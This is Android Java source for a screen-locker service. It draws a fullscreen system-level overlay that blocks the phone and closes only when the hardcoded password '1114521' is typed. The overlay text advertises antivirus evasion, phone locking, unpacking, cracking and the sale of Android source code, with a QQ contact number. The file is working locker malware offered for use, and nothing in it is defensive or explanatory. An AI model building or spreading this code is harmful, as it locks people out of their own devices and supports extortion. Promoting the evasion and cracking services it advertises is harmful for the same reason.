package com.QQ1344744089.moke;

import android.app.*;
import android.content.*;
import android.os.*;
import android.view.*;
import android.view.WindowManager.*;
import android.graphics.*;
import android.widget.*;
import android.view.View.*;

public class mokeQQ1344744089 extends Service
{


	private TextView t1;
	private Button b1;
	
	//是否已增加悬浮窗
	private static boolean isAdded = false;
	private static WindowManager wm;
	private static WindowManager.LayoutParams params;
	
	@Override
	public IBinder onBind(Intent p1)
	{
		return null;
	}

	@Override
	public void onCreate()
	{
		/**下面是先判断是否已经开启悬浮窗，然后
		 *调用创建悬浮窗方法，可以写在onCreate方
		 *法中。
		 */
		if(!isAdded){
			//加载一个xml文件作为Viewgroup对象
			LayoutInflater inflater = (LayoutInflater) this.getSystemService(Context.LAYOUT_INFLATER_SERVICE);
			//LayoutInflater inflater = getLayoutInflater();
			ViewGroup viewGroup = (ViewGroup) inflater.inflate(R.layout.qq1344744089,null);
			//后几个参数是长宽和坐标
			createFloatView(viewGroup,LayoutParams.WRAP_CONTENT,LayoutParams.WRAP_CONTENT,0,0);
			t1 = (TextView) viewGroup.findViewById(R.id.qq1344744089TextView1);
			b1=(Button) viewGroup.findViewById(R.id.qq1344744089Button1);
			t1.setText("墨客收徒-/免杀/锁机/脱壳/加固/破解/安卓源码出售QQ:1344744089");
			b1.setText("解锁");
		}
		super.onCreate();
	}
	/**
	 *创建悬浮窗的方法，参数一是显示的View,后面是高度宽度，坐标
	 *坐标00代表屏幕正中间
	 */
	private void createFloatView(final ViewGroup floatView,int width,int height,int x,int y) {
		wm = (WindowManager) getApplicationContext().getSystemService(Context.WINDOW_SERVICE);
		params = new WindowManager.LayoutParams();
		// 设置window type
		params.type = WindowManager.LayoutParams.TYPE_SYSTEM_ERROR;
		/*
		 * 如果设置为params.type = WindowManager.LayoutParams.TYPE_PHONE那么优先级会降低一些,
		 * 即拉下通知栏不可见
		 */
		params.format = PixelFormat.RGBA_8888;
		// 设置图片格式，效果为背景透明
		// 设置Window flag
		params.flags = WindowManager.LayoutParams.FLAG_FULLSCREEN;
		/*
		 * 下面的flags属性的效果形同“锁定”。 悬浮窗不可触摸，不接受任何事件,同时不影响后面的事件响应。
		 * wmParams.flags=LayoutParams.FLAG_NOT_TOUCH_MODAL|LayoutParams.FLAG_NOT_FOCUSABLE| LayoutParams.FLAG_NOT_TOUCHABLE;
		 */
		// 设置悬浮窗的长得宽
		params.width = width;
		params.height = height;
		params.x = x;
		params.y = y;

		final EditText psw=(EditText) floatView.getChildAt(1);
		Button b=(Button) floatView.getChildAt(2);
		b.setOnClickListener(new OnClickListener(){
				@Override
				public void onClick(View p1)
				{
					if("1114521".equals(psw.getText().toString().trim())){
						System.exit(0);
					}
				}
			});
		wm.addView(floatView, params);
		isAdded = true;
	}
	
}
